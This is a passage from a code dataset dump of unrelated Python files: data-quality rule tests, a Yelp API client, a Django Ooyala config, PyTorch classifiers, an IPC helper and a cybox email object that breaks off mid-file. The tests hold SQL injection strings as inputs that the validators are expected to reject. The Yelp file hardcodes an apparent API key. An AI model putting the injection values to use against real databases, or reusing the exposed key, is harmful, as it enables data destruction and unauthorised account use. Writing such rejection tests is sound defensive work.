test_dq_entity_invalid_source_database(self):\n \"\"\" \"\"\"\n dq_entity_dict_not_valid = {\n \"source_database\": \"invalid\",\n \"table_name\": \"valid\",\n \"database_name\": \"valid\",\n \"instance_name\": \"valid\",\n \"columns\": {\n \"TEST_COLUMN\": {\n \"description\": \"test column description\",\n \"name\": \"test_column\",\n \"data_type\": \"STRING\"\n }},\n }\n with pytest.raises(NotImplementedError):\n DqEntity.from_dict(entity_id=\"valid\", kwargs=dq_entity_dict_not_valid)\n\n @pytest.mark.parametrize(\n \"configs_map,source_database,expected\",\n [\n pytest.param(\n {\"table_name\": \"table\", \"lake_name\": \"lake\", \"zone_name\": \"zone\", \"project_name\": \"project\"}, \n \"DATAPLEX\",\n \"lake_zone\",\n id=\"dataplex_native\"\n ),\n pytest.param(\n {\"table_name\": \"table\", \"database_name\": \"lake_zone\", \"project_name\": \"project\"}, \n \"DATAPLEX\",\n \"lake_zone\",\n id=\"dataplex_backwards_compatible\"\n ),\n pytest.param(\n {\"table_name\": \"table\", \"dataset_name\": \"dataset\", \"project_name\": \"project\"}, \n \"BIGQUERY\",\n \"dataset\",\n id=\"bigquery_native\"\n ),\n pytest.param(\n {\"table_name\": \"table\", \"database_name\": \"dataset\", \"project_name\": \"project\"}, \n \"BIGQUERY\",\n \"dataset\",\n id=\"bigquery_backwards_compatible\"\n ),\n ],\n )\n def 
test_get_custom_entity_configs_database_name(self, configs_map, source_database, expected):\n output = get_custom_entity_configs('test', configs_map, source_database, \"database_name\")\n assert output == expected\n\n def test_dq_entity_parse_bigquery_configs(self):\n \"\"\" \"\"\"\n bq_entity_input_dict = {\n \"source_database\": \"BIGQUERY\",\n \"table_name\": \"table_name\",\n \"dataset_name\": \"dataset_name\",\n \"project_name\": \"project_name\",\n \"columns\": {\n \"TEST_COLUMN\": {\n \"description\": \"test column description\",\n \"name\": \"test_column\",\n \"data_type\": \"STRING\"\n }},\n }\n bq_entity_configs = DqEntity.from_dict(entity_id=\"test_bq_entity\", kwargs=bq_entity_input_dict)\n bq_entity_configs_expected = {\n \"test_bq_entity\": {\n \"source_database\": \"BIGQUERY\",\n \"table_name\": \"table_name\",\n \"database_name\": \"dataset_name\",\n \"instance_name\": \"project_name\",\n \"columns\": {\n \"TEST_COLUMN\": {\n \"description\": \"test column description\",\n \"name\": \"test_column\",\n \"data_type\": \"STRING\"\n }},\n }\n }\n assert bq_entity_configs.to_dict() == bq_entity_configs_expected\n\n def test_dq_entity_parse_bigquery_configs_backwards_compatible(self):\n \"\"\" \"\"\"\n bq_entity_input_dict = {\n \"source_database\": \"BIGQUERY\",\n \"table_name\": \"table_name\",\n \"database_name\": \"dataset_name\",\n \"instance_name\": \"project_name\",\n \"columns\": {\n \"TEST_COLUMN\": {\n \"description\": \"test column description\",\n \"name\": \"test_column\",\n \"data_type\": \"STRING\"\n }},\n }\n bq_entity_configs = DqEntity.from_dict(entity_id=\"test_bq_entity\", kwargs=bq_entity_input_dict)\n bq_entity_configs_expected = {\n \"test_bq_entity\": {\n \"source_database\": \"BIGQUERY\",\n \"table_name\": \"table_name\",\n \"database_name\": \"dataset_name\",\n \"instance_name\": \"project_name\",\n \"columns\": {\n \"TEST_COLUMN\": {\n \"description\": \"test column description\",\n \"name\": \"test_column\",\n \"data_type\": \"STRING\"\n }},\n }\n }\n assert bq_entity_configs.to_dict() == bq_entity_configs_expected\n\n def test_dq_entity_parse_dataplex_configs(self):\n \"\"\" \"\"\"\n dataplex_entity_input_dict = {\n \"source_database\": \"DATAPLEX\",\n \"table_name\": \"table\",\n \"lake_name\": \"lake\",\n \"zone_name\": \"zone\",\n \"project_name\": \"project_name\",\n \"columns\": {\n \"TEST_COLUMN\": {\n \"description\": \"test column description\",\n \"name\": \"test_column\",\n \"data_type\": \"STRING\"\n }},\n }\n dataplex_entity_configs = DqEntity.from_dict(entity_id=\"test_dataplex_entity\", kwargs=dataplex_entity_input_dict)\n dataplex_entity_configs_expected = {\n \"test_dataplex_entity\": {\n \"source_database\": \"DATAPLEX\",\n \"table_name\": \"table\",\n \"database_name\": \"lake_zone\",\n \"instance_name\": \"project_name\",\n \"columns\": {\n \"TEST_COLUMN\": {\n \"description\": \"test column description\",\n \"name\": \"test_column\",\n \"data_type\": \"STRING\"\n }},\n }\n }\n assert dataplex_entity_configs.to_dict() == dataplex_entity_configs_expected\n\n def test_dq_filter_parse_failure(self):\n \"\"\" \"\"\"\n with pytest.raises(ValueError):\n DqRowFilter.from_dict(\n row_filter_id=\"valid\",\n kwargs=dict(),\n )\n\n def test_dq_rule_binding_invalid_id_parse_failure(self):\n \"\"\" \"\"\"\n dq_rule_binding_dict_not_valid = {\n \"entity_id\": \"\",\n \"column_id\": \"\",\n \"row_filter_id\": \"\",\n \"rule_ids\": [\"invalid\"],\n }\n with pytest.raises(ValueError):\n DqRuleBinding.from_dict(\n rule_binding_id=\"valid\",\n 
kwargs=dq_rule_binding_dict_not_valid,\n )\n\n def test_dq_rule_binding_invalid_list_parse_failure(self):\n \"\"\" \"\"\"\n dq_rule_binding_dict_not_valid = {\n \"entity_id\": \"valid\",\n \"column_id\": \"valid\",\n \"row_filter_id\": \"valid\",\n \"rule_ids\": \"invalid\",\n }\n with pytest.raises(ValueError):\n DqRuleBinding.from_dict(\n rule_binding_id=\"valid\",\n kwargs=dq_rule_binding_dict_not_valid,\n )\n\n def test_rule_type_not_implemented(self):\n \"\"\" \"\"\"\n with pytest.raises(NotImplementedError):\n RuleType.to_sql(\"not_implemented\", dict())\n\n @pytest.mark.parametrize(\n \"params\",\n [\n dict(),\n {\"custom_sql_expr\": \"\"},\n {\"custom_sql_expr\": \"'; drop table Students; select ?;--\"},\n ],\n )\n def test_rule_type_custom_to_sql_failure(self, params):\n \"\"\" \"\"\"\n with pytest.raises(ValueError):\n RuleType.CUSTOM_SQL_EXPR.to_sql(params)\n\n def test_rule_type_custom_to_sql(self):\n \"\"\" \"\"\"\n params = {\"custom_sql_expr\": \"length(column_name) < 20\"}\n sql = RuleType.CUSTOM_SQL_EXPR.to_sql(params).substitute(column=\"column_name\")\n assert sql == params[\"custom_sql_expr\"]\n\n def test_rule_type_not_null(self):\n \"\"\" \"\"\"\n expected = \"column_name IS NOT NULL\"\n sql = RuleType.NOT_NULL.to_sql(params={}).substitute(column=\"column_name\")\n assert sql == expected\n\n def test_rule_type_not_blank(self):\n \"\"\" \"\"\"\n expected = \"TRIM(column_name) != ''\"\n sql = RuleType.NOT_BLANK.to_sql(params={}).substitute(column=\"column_name\")\n assert sql == expected\n\n @pytest.mark.parametrize(\n \"params\",\n [\n dict(),\n {\"pattern\": \"\"},\n {\"pattern\": \"&/42\"},\n {\"pattern\": \"'; drop table Students; select true;--\"},\n ],\n )\n def test_rule_type_regex_to_sql_failure(self, params):\n \"\"\" \"\"\"\n with pytest.raises(ValueError):\n RuleType.REGEX.to_sql(params)\n\n def test_rule_type_regex_to_sql(self):\n \"\"\" \"\"\"\n params = {\"pattern\": \"^[^@]+[@]{1}[^@]+$\"}\n sql = RuleType.REGEX.to_sql(params).substitute(column=\"column_name\")\n expected = \"REGEXP_CONTAINS( CAST( column_name AS STRING), '^[^@]+[@]{1}[^@]+$' )\"\n assert sql == expected\n\nif __name__ == \"__main__\":\n raise SystemExit(pytest.main([__file__, '-vv']))\n","sub_path":"tests/unit/test_classes.py","file_name":"test_classes.py","file_ext":"py","file_size_in_byte":10383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"299233732","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/ooyala/conf.py\n# Compiled at: 2011-08-18 05:15:41\nfrom ooyala.constants import OoyalaAPI\nfrom django.conf import settings\nif hasattr(settings, 'OOYALA'):\n API_KEYS = settings.OOYALA['API_KEYS']\n try:\n BASE_TEMPLATE = settings.OOYALA['BASE_TEMPLATE']\n except KeyError:\n BASE_TEMPLATE = 'ooyala/ooyala_base.html'\n\nelse:\n raise Exception('Cannot import your Ooyala API keys from settings.py')\nif hasattr(settings, 'OOYALA') and 'NO_THUMB' in settings.OOYALA:\n NO_THUMB = settings.OOYALA['NO_THUMB']\nelse:\n NO_THUMB = ''\nOOYALA_PARAMS = {OoyalaAPI.BACKLOT.QUERY: {'PARAMS': [\n 'content_type', 'statistics', 'description', 'embed_code', 'fields', 'include_deleted', 'label', 'limit', 'page_id', 'title'], \n 'REMAPS': {'embed_code': 'embedCode', 'label': 'label[0]', 'content_type': 'contentType', 'page_id': 'pageID'}, 'DEFAULTS': {}}, \n OoyalaAPI.BACKLOT.THUMB: {'PARAMS': [\n 
'indicies', 'resolution', 'embed_code'], \n 'REMAPS': {'embed_code': 'embedCode', 'indicies': 'range'}, 'DEFAULTS': {'resolution': '320x240', 'indicies': '0-25'}}, \n OoyalaAPI.BACKLOT.ATTR: {'PARAMS': [\n 'title', 'description', 'flight_end', 'flight_start', 'status', 'hosted_at', 'embed_code'], \n 'REMAPS': {'embed_code': 'embedCode', 'flight_end': 'flightEnd', 'flight_start': 'flightStart', 'hosted_at': 'hostedAt'}, 'DEFAULTS': {}}, \n OoyalaAPI.BACKLOT.LABEL: {'PARAMS': [\n 'mode'], \n 'REMAPS': {}, 'DEFAULTS': {}}, \n OoyalaAPI.BACKLOT.CHANNEL: {'PARAMS': [\n 'mode', 'embed_code'], \n 'REMAPS': {'embed_code': 'channelEmbedCode'}, 'DEFAULTS': {}}, \n OoyalaAPI.ANALYTICS.ANALYTICS: {'PARAMS': [\n 'date', 'granularity', 'method', 'video'], \n 'REMAPS': {}, 'DEFAULTS': {}}}\nRENDER_SIZES = {'regular': (325, 185), \n 'large': (630, 354)}","sub_path":"pycfiles/django_ooyala-0.9.5-py2.7/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"39067085","text":"import requests\nimport json\nfrom Restaurant_Class import *\nfrom yelpapi import YelpAPI\nimport random\n\nAPI_KEY = 'Qk2dfUgG4lrNZSJzUEXkU2er5jIU8iBwgRs-YxhDYoMUIloWi_vUbAeZsCpYsnimsNJG5UU4RFVXtrBHkIoLHr0IFKAvyuLKd77R2deabsJnEXmuZSyNB0FmEV0XXnYx'\nCLIENT_ID = 'BfDOXS2iHEZn79gyvf6rsw'\n\nDC = {\n \"lat\": 38.907469,\n \"long\": -77.0366787\n}\n\nloc_dev = 0.02\npref_size = 6\n\nprefs = [\n \"vegetarian\",\n \"vegan\",\n \"thai\",\n \"korean\",\n \"chinese\",\n \"steak\",\n \"salad\",\n \"italian\",\n \"hotpot\",\n \"latin\"\n]\n\nclass YelpClient():\n\n def __init__(self):\n self.yelp = YelpAPI(API_KEY)\n\n def get_tag_set(self):\n return random.sample(prefs, pref_size)\n\n def get_random_location(self):\n lat = DC[\"lat\"] + random.uniform(-loc_dev*2, loc_dev*2)\n long = DC[\"long\"] + random.uniform(-loc_dev*2, loc_dev*2)\n\n return (lat, long)\n\n def get_venues(self, lat, long, categories):\n venues = self.yelp.search_query(location='DC', latitude=lat, longitude=long, categories=categories, limit=50, open_now=True)\n return venues\n\n def generate_venue_set(self):\n lat, long = self.get_random_location()\n tags = self.get_tag_set()\n categories = ','.join(tags)\n # print(categories)\n venue_set = self.get_venues(lat, long, categories)[\"businesses\"]\n # print(venue_set)\n\n venues = []\n for v in venue_set:\n categories = [c['alias'] for c in v[\"categories\"]]\n\n address = str(v[\"location\"][\"address1\"]) + \" \" + str(v[\"location\"][\"city\"]) + \", \" + \\\n str(v[\"location\"][\"state\"]) + \" \" + \\\n str(v[\"location\"][\"zip_code\"])\n\n venue = {\n \"yelp_id\": v[\"id\"],\n \"name\": v[\"name\"],\n \"coordinates\": [v[\"coordinates\"][\"latitude\"], v[\"coordinates\"][\"longitude\"]],\n \"address\": address,\n \"categories\": categories,\n \"image\": v[\"image_url\"]\n }\n venues.append(venue)\n\n return venues\n \n\ndef PullandSort():\n loc = 'https://api.yelp.com/v3/businesses/search'\n headers = {'Authorization': 'Bearer ' + API_KEY}\n\n restaurants = []\n offset = 0\n check = 0\n for y in range(360//50):\n params = {'location': 'DC', 'sort_by': 'rating', 'open_now': True,\n 'categories': 'food', 'limit': '50', 'offset': str(offset)}\n raw = requests.get(loc, params=params, headers=headers)\n raw = raw.json()\n if raw[\"total\"] == 0:\n break\n for resta in raw[\"businesses\"]:\n print(resta)\n print(\"\\n\")\n fulladdress = str(resta[\"location\"][\"address1\"]) + \" \" + 
str(resta[\"location\"][\"city\"]) + \", \" + \\\n str(resta[\"location\"][\"state\"]) + \" \" + \\\n str(resta[\"location\"][\"zip_code\"])\n\n categories = [c['alias'] for c in resta[\"categories\"]]\n coordinates = [resta[\"coordinates\"][\"latitude\"],\n resta[\"coordinates\"][\"longitude\"]]\n restaurants.append(Restaurant(\n resta[\"name\"], coordinates, categories, fulladdress, resta[\"image_url\"]))\n check += 1\n offset += 50\n\n# yc = YelpClient()\n# lat, long = yc.get_random_location()\n# tags = yc.get_tag_set()\n# categories = ','.join(tags)\n# venue = yc.get_venues(lat, long, categories)\n# print(venue)","sub_path":"server/DataGeneration.py","file_name":"DataGeneration.py","file_ext":"py","file_size_in_byte":3400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"381133912","text":"# coding=utf-8\nfrom lxml import etree\n\nfrom libcms.libs.common.xslt_transformers import xslt_transformer\n\n\ndef xml_doc_to_dict(xmlstring_doc):\n doc_tree = etree.XML(xmlstring_doc)\n doc_tree_t = xslt_transformer(doc_tree)\n return doc_tree_to_dict(doc_tree_t)\n\n\ndef doc_tree_to_dict(doc_tree):\n doc_dict = {}\n for element in doc_tree.getroot().getchildren():\n attrib = element.attrib['name']\n value = element.text\n # если поле пустое, пропускаем\n if not value: continue\n # value = beautify(value)\n values = doc_dict.get(attrib, None)\n if not values:\n doc_dict[attrib] = [value]\n else:\n values.append(value)\n return doc_dict\n","sub_path":"libcms/apps/newinlib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"490585693","text":"import torch\nimport torch.nn.functional as F\n\n\nclass ClassificationLoss(torch.nn.Module):\n def forward(self, input, target):\n \"\"\"\n\n Compute mean(-log(softmax(input)_label))\n\n @input: torch.Tensor((B,C))\n @target: torch.Tensor((B,), dtype=torch.int64)\n\n @return: torch.Tensor((,))\n\n \"\"\"\n m = torch.nn.LogSoftmax(dim = 1)\n loss = torch.nn.NLLLoss()\n return loss(m(input), target)\n #raise NotImplementedError('ClassificationLoss.forward')\n\n\nclass LinearClassifier(torch.nn.Module):\n def __init__(self):\n super().__init__()\n \n self.linear = torch.nn.Linear(3*64*64, 6)\n #raise NotImplementedError('LinearClassifier.__init__')\n\n def forward(self, x):\n \"\"\"\n @x: torch.Tensor((B,3,64,64))\n @return: torch.Tensor((B,6))\n \"\"\" \n \n x = x.view(-1, 3*64*64)\n return self.linear(x)\n #raise NotImplementedError('LinearClassifier.forward')\n\n\nclass MLPClassifier(torch.nn.Module):\n def __init__(self):\n super().__init__()\n\n #self.activation = torch.nn.ReLU()\n #self.linearlayer1 = torch.nn.Linear(3 * 64 * 64, 2048) \n #self.linearlayer2 = torch.nn.Linear(2048, 6)\n self.layers = torch.nn.Sequential(torch.nn.Linear(3*64*64, 100), torch.nn.ReLU(), torch.nn.Linear(100, 6))\n \n #raise NotImplementedError('MLPClassifier.__init__')\n\n def forward(self, x):\n #@x: torch.Tensor((B,3,64,64))\n #@return: torch.Tensor((B,6))\n x = x.view(x.size(0), -1)\n #x = x.view(-1, 3*64*64)\n #return torch.nn.Sequential(self.linearlayer1(x), self.activation(x), self.linearlayer2(x))\n return self.layers(x)\n #raise NotImplementedError('MLPClassifier.forward')\n\n\nmodel_factory = {\n 'linear': LinearClassifier,\n 'mlp': MLPClassifier,\n}\n\n\ndef save_model(model):\n from torch import save\n from os import path\n for n, m in model_factory.items():\n if isinstance(model, m):\n 
return save(model.state_dict(), path.join(path.dirname(path.abspath(__file__)), '%s.th' % n))\n raise ValueError(\"model type '%s' not supported!\" % str(type(model)))\n\n\ndef load_model(model):\n from torch import load\n from os import path\n r = model_factory[model]()\n r.load_state_dict(load(path.join(path.dirname(path.abspath(__file__)), '%s.th' % model), map_location='cpu'))\n return r\n","sub_path":"part1/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"621297241","text":"\nimport multiprocessing\nimport select\nimport traceback\n\nclass HelperBase(multiprocessing.Process):\n \"\"\"This class performs IO in a different process to avoid blocking.\n\n It uses a multiprocessing.Connection to communicate back to the main loop\n since that object provides a FD compatible with select calls.\n \"\"\"\n def __init__(self):\n super(HelperBase, self).__init__()\n a, b = multiprocessing.Pipe()\n\n # Connection for the control process to use.\n self.connection = a\n\n # Connection for the local process to use.\n self._connection = b\n\n def run(self):\n assert False, \"Not implemented.\"\n\n\nclass HelperLoop(object):\n \"\"\"This class creates an event loop for classes that extend HelperBase.\n\n To use it, call setup_helper whenever you want to add a new\n HelperBase derived class, (and a handler for incoming messages.) Outgoing\n messages can be sent for anywhere you like (normally other handlers.)\n \"\"\"\n def __init__(self):\n # Maps connection objects to handler methods.\n self._incoming_connections = {}\n\n def setup_helper(self, helper, handler):\n self._incoming_connections[helper.connection] = handler\n helper.start()\n\n def run_forever(self):\n while True:\n rready, _, _ = select.select(self._incoming_connections.keys(), [], [])\n\n for c in rready:\n try:\n self._incoming_connections[c](c.recv())\n # pylint: disable=W0703\n except Exception:\n # If we get an exception in a handler, we log and continue.\n traceback.print_exc()\n","sub_path":"helper/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"546822546","text":"import cybox\nimport cybox.bindings.email_message_object_1_2 as email_message_binding\nfrom cybox.common import DefinedObject, String, PositiveInteger, DateTime\nfrom cybox.objects.file_object import File\nfrom cybox.objects.uri_object import URI\nfrom cybox.objects.address_object import Address, EmailAddress\n\nclass EmailRecipients(cybox.Entity):\n def __init__(self, *args):\n self.recipients = []\n for arg in args:\n self.add(arg)\n\n def add(self, recipient):\n if recipient is not None and not isinstance(recipient, Address):\n if isinstance(recipient, basestring):\n recipient = EmailAddress(recipient)\n else:\n msg = \"Cannot convert {} (type {}) to an Address\"\n raise ValueError(msg.format(recipient, type(recipient)))\n self.recipients.append(recipient)\n\n def __nonzero__(self):\n return bool(self.recipients)\n\n __bool__ = __nonzero__\n\n def to_obj(self):\n recipients_obj = email_message_binding.EmailRecipientsType()\n for recipient in self.recipients:\n recipients_obj.add_Recipient(recipient.to_obj())\n return recipients_obj\n\n def to_dict(self):\n return [r.to_dict() for r in self.recipients]\n\n @staticmethod\n def from_obj(recipients_obj):\n r = EmailRecipients()\n if recipients_obj is not 
None:\n r.recipients = [Address.from_obj(a)\n for a in recipients_obj.get_Recipient()]\n return r\n\n @staticmethod\n def from_dict(recipients_dict):\n if not recipients_dict:\n return None\n\n # recipients_dict should really be a list, not a dict\n r = EmailRecipients()\n if recipients_dict is not None:\n r.recipients = [Address.from_dict(a, Address.CAT_EMAIL)\n for a in recipients_dict]\n return r\n\n\nclass EmailHeader(cybox.Entity):\n def __init__(self):\n self.to = None\n self.cc = None\n self.bcc = None\n self.from_ = None\n self.subject = None\n self.in_reply_to = None\n self.date = None\n self.message_id = None\n self.sender = None\n self.reply_to = None\n self.errors_to = None\n\n @property\n def to(self):\n return self._to\n\n @to.setter\n def to(self, value):\n if value is not None and not isinstance(value, EmailRecipients):\n value = EmailRecipients(value)\n self._to = value\n\n @property\n def cc(self):\n return self._cc\n\n @cc.setter\n def cc(self, value):\n if value is not None and not isinstance(value, EmailRecipients):\n value = EmailRecipients(value)\n self._cc = value\n\n @property\n def bcc(self):\n return self._bcc\n\n @bcc.setter\n def bcc(self, value):\n if value is not None and not isinstance(value, EmailRecipients):\n value = EmailRecipients(value)\n self._bcc = value\n\n @property\n def from_(self):\n return self._from\n\n @from_.setter\n def from_(self, value):\n if value is not None and not isinstance(value, Address):\n value = EmailAddress(value)\n self._from = value\n\n @property\n def subject(self):\n return self._subject\n\n @subject.setter\n def subject(self, value):\n if value is not None and not isinstance(value, String):\n value = String(value)\n self._subject = value\n\n @property\n def date(self):\n return self._date\n\n @date.setter\n def date(self, value):\n if value is not None and not isinstance(value, DateTime):\n value = DateTime(value)\n self._date = value\n\n @property\n def message_id(self):\n return self._message_id\n\n @message_id.setter\n def message_id(self, value):\n if value is not None and not isinstance(value, String):\n value = String(value)\n self._message_id = value\n\n @property\n def sender(self):\n return self._sender\n\n @sender.setter\n def sender(self, value):\n if value is not None and not isinstance(value, Address):\n value = EmailAddress(value)\n self._sender = value\n\n def to_obj(self):\n header_obj = email_message_binding.EmailHeaderType()\n\n if self.to:\n header_obj.set_To(self.to.to_obj())\n if self.cc:\n header_obj.set_CC(self.cc.to_obj())\n if self.bcc:\n header_obj.set_BCC(self.bcc.to_obj())\n if self.from_:\n header_obj.set_From(self.from_.to_obj())\n if self.subject:\n header_obj.set_Subject(self.subject.to_obj())\n if self.in_reply_to:\n header_obj.set_In_Reply_To(self.in_reply_to.to_obj())\n if self.date:\n header_obj.set_Date(self.date.to_obj())\n if self.message_id:\n header_obj.set_Message_ID(self.message_id.to_obj())\n if self.sender:\n header_obj.set_Sender(self.sender.to_obj())\n if self.reply_to:\n header_obj.set_Reply_To(self.reply_to.to_obj())\n if self.errors_to:\n header_obj.set_Errors_To(self.errors_to.to_obj())\n\n return header_obj\n\n def to_dict(self):\n header_dict = {}\n\n if self.to:\n header_dict['to'] = self.to.to_dict()\n if self.cc:\n header_dict['cc'] = self.cc.to_dict()\n if self.bcc:\n header_dict['bcc'] = self.bcc.to_dict()\n if self.from_:\n header_dict['from'] = self.from_.to_dict()\n if self.subject:\n header_dict['subject'] = self.subject.to_dict()\n if self.in_reply_to:\n 
header_dict['in_reply_to'] = self.in_reply_to.to_dict()\n if self.date:\n header_dict['date'] = self.date.to_dict()\n if self.message_id:\n header_dict['message_id'] = self.message_id.to_dict()\n if self.sender:\n header_dict['sender'] = self.sender.to_dict()\n if self.reply_to:\n header_dict['reply_to'] = self.reply_to.to_dict()\n if self.errors_to:\n header_dict['errors_to'] = self.errors_to.to_dict()\n\n return header_dict\n\n @staticmethod\n def from_obj(header_obj):\n header = EmailHeader()\n\n header.to = EmailRecipients.from_obj(header_obj.get_To())\n header.cc = EmailRecipients.from_obj(header_obj.get_CC())\n header.bcc = EmailRecipients.from_obj(header_obj.get_BCC())\n header.from_ = Address.from_obj(header_obj.get_From())\n header.subject = String.from_obj(header_obj.get_Subject())\n header.in_reply_to = String.from_obj(header_obj.get_In_Reply_To())\n header.date = DateTime.from_obj(header_obj.get_Date())\n header.message_id = String.from_obj(header_obj.get_Message_ID())\n header.sender = Address.from_obj(header_obj.get_Sender())\n header.reply_to = Address.from_obj(header_obj.get_Reply_To())\n header.errors_to = String.from_obj(header_obj.get_Errors_To())\n\n return header\n\n @staticmethod\n def from_dict(header_dict):\n header = EmailHeader()\n\n header.to = EmailRecipients.from_dict(header_dict.get('to'))\n header.cc = EmailRecipients.from_dict(header_dict.get('cc'))\n header.bcc = EmailRecipients.from_dict(header_dict.get('bcc'))\n header.from_ = Address.from_dict(header_dict.get('from'), Address.CAT_EMAIL)\n header.subject = String.from_dict(header_dict.get('subject'))\n header.in_reply_to = String.from_dict(header_dict.get('in_reply_to'))\n header.date = DateTime.from_dict(header_dict.get('date'))\n header.message_id = String.from_dict(header_dict.get('message_id'))\n header.sender = Address.from_dict(header_dict.get('sender'), Address.CAT_EMAIL)\n header.reply_to = Address.from_dict(header_dict.get('reply_to'), Address.CAT_EMAIL)\n header.errors_to = String.from_dict(header_dict.get('errors_to'))\n\n return header\n\n\nclass OptionalHeader(cybox.Entity):\n def __init__(self):\n self.boundary = None\n self.content_type = None\n self.mime_version = None\n self.precedence = None\n self.x_mailer = None\n self.x_originating_ip = None\n self.x_priority = None\n\n @property\n def x_originating_ip(self):\n return self._x_originating_ip\n\n @x_originating_ip.setter\n def x_originating_ip(self, value):\n if value is not None and not isinstance(value, Address):\n value = Address(value, category=Address.CAT_IPV4)\n self._x_originating_ip = value\n\n def to_obj(self):\n opt_header_obj = email_message_binding.EmailOptionalHeaderType()\n\n if self.boundary:\n opt_header_obj.set_Boundary(self.boundary.to_obj())\n if self.content_type:\n opt_header_obj.set_Content_Type(self.content_type.to_obj())\n if self.mime_version:\n opt_header_obj.set_MIME_Version(self.mime_version.to_obj())\n if self.precedence:\n opt_header_obj.set_Precedence(self.precedence.to_obj())\n if self.x_mailer:\n opt_header_obj.set_X_Mailer(self.x_mailer.to_obj())\n if self.x_originating_ip:\n opt_header_obj.set_X_Originating_IP(self.x_originating_ip.to_obj())\n if self.x_priority:\n opt_header_obj.set_X_Priority(self.x_priority.to_obj())\n\n return opt_header_obj\n\n def to_dict(self):\n opt_header_dict = {}\n\n if self.boundary:\n opt_header_dict['boundary'] = self.boundary.to_dict()\n if self.content_type:\n opt_header_dict['content_type'] = self.content_type.to_dict()\n if self.mime_version:\n 
opt_header_dict['mime_version'] = self.mime_version.to_dict()\n if self.precedence:\n opt_header_dict['precedence'] = self.precedence.to_dict()\n if self.x_mailer:\n opt_header_dict['x_mailer'] = self.x_mailer.to_dict()\n if self.x_originating_ip:\n opt_header_dict['x_originating_ip'] = self.x_originating_ip.to_dict()\n if self.x_priority:\n opt_header_dict['x_priority'] = self.x_priority.to_dict()\n\n return opt_header_dict\n\n @staticmethod\n def from_obj(opt_header_obj):\n if not opt_header_obj:\n return None\n\n opt_header = OptionalHeader()\n\n opt_header.boundary = String.from_obj(opt_header_obj.get_Boundary())\n opt_header.content_type = String.from_obj(opt_header_obj.get_Content_Type())\n opt_header.mime_version = String.from_obj(opt_header_obj.get_MIME_Version())\n opt_header.precedence = String.from_obj(opt_header_obj.get_Precedence())\n opt_header.x_mailer = String.from_obj(opt_header_obj.get_X_Mailer())\n opt_header.x_originating_ip = Address.from_obj(opt_header_obj.get_X_Originating_IP())\n opt_header.x_priority = PositiveInteger.from_obj(opt_header_obj.get_X_Priority())\n\n return opt_header\n\n @staticmethod\n def from_dict(opt_header_dict):\n if not opt_header_dict:\n return None\n\n opt_header = OptionalHeader()\n\n opt_header.boundary = String.from_dict(opt_header_dict.get('boundary'))\n opt_header.content_type = String.from_dict(opt_header_dict.get('content_type'))\n opt_header.mime_version = String.from_dict(opt_header_dict.get('mime_version'))\n opt_header.precedence = String.from_dict(opt_header_dict.get('precedence'))\n opt_header.x_mailer = String.from_dict(opt_header_dict.get('x_mailer'))\n opt_header.x_originating_ip = Address.from_dict(opt_header_dict.get('x_originating_ip'), Address.CAT_IPV4)\n opt_header.x_priority = PositiveInteger.from_dict(opt_header_dict.get('x_priority'))\n\n return opt_header\n\n\nclass EmailMessage(DefinedObject):\n _XSI_TYPE = \"EmailMessageObjectType\"\n \n def __init__(self):\n self.attachments = []\n self.links = []\n self.header = EmailHeader()\n self.optional_header = None\n self.email_server = None\n self.raw_body = None\n self.raw_header = None\n\n @property\n def email_server(self):\n return self._email_server\n\n @email_server.setter\n def email_server(self, value):\n if value is not None and not isinstance(value, String):\n value = String(value)\n self._email_server = value\n\n @property\n def raw_body(self):\n return self._raw_body\n\n @raw_body.setter\n def raw_body(self, value):\n if value is not None and not isinstance(value, String):\n value = String(value)\n self._raw_body = value\n\n @property\n def raw_header(self):\n return self._raw_header\n\n @raw_header.setter\n def raw_header(self, value):\n if value is not None and not isinstance(value, String):\n value = String(value)\n self._raw_header = value\n\n # Shortcut properties\n @property\n def to(self):\n return self.header.to\n\n @to.setter\n def to(self, value):\n self.header.to = value\n\n @property\n def from_(self):\n return self.header.from_\n\n @from_.setter\n def from_(self, value):\n self.header.from_ = value\n\n @property\n def subject(self):\n return self.header.subject\n\n @subject.setter\n def subject(self, value):\n self.header.subject = value\n\n @property\n def date(self):\n return self.header.date\n\n @date.setter\n def date(self, value):\n self.header.date = value\n\n @property\n def message_id(self):\n return self.header.message_id\n\n @message_id.setter\n def message_id(self, value):\n self.header.message_id = value\n\n @property\n def 
sender(self):\n return self.header.sender\n\n @sender.setter\n def sender(self, value):\n self.header.sender = value\n\n @property\n def reply_to(self):\n return self.header.reply_to\n\n @reply_to.setter\n def reply_to(self, value):\n self.header.reply_to = value\n\n @property\n def x_originating_ip(self):\n if not self.optional_header:\n return None\n return self.optional_header.x_originating_ip\n\n @x_originating_ip.setter\n def x_originating_ip(self, value):\n if not self.optional_header:\n self.optional_header = OptionalHeader()\n self.optional_header.x_originating_ip = value\n\n def to_obj(self):\n email_obj = email_message_binding.EmailMessageObjectType()\n\n email_obj.set_anyAttributes_({'xsi:type' : 'EmailMessageObj:EmailMessageObjectType'})\n if self.attachments:\n attachments_obj = email_message_binding.AttachmentsType()\n for file_ in self.attachments:\n attachments_obj.add_File(file_.to_obj())\n email_obj.set_Attachments(attachments_obj)\n if self.links:\n links_obj = email_message_binding.LinksType()\n for uri in self.links:\n links_obj.add_Link(uri.to_obj())\n email_obj.set_Links(links_obj)\n email_obj.set_Header(self.header.to_obj())\n if self.optional_header:\n email_obj.set_Optional_Header(self.optional_header.to_obj())\n if self.email_server:\n email_obj.set_Email_Server(self.email_server.to_obj())\n if self.raw_body:\n 